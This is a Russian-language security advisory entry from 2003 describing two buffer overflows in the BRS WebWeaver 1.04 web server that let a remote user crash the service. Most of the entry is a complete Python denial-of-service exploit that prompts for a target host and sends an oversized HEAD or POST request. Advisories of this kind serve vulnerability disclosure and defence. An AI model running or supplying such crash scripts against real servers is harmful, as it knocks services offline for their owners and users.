| Дата публикации: | 30.05.2003 |
| Всего просмотров: | 1234 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
Microsoft Windows 98
Microsoft Windows 98 Second Edition BRS WebWeaver 1.x |
| Описание: | Два переполнения буфера обнаружены в BRS WebWeaver. Удаленный пользователь может аварийно завершить работу web сервиса.
F0KP сообщает, что удаленный пользователь может послать 32700 символов в HTTP POST или HEAD запросе, чтобы аварийно завершить работу Web сервиса. Эксплоит:
#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
Уязвимость обнаружена в BRS WebWeaver 1.04
|
| Ссылки: | BRS WebWeaver: POST and HEAD Overflaws |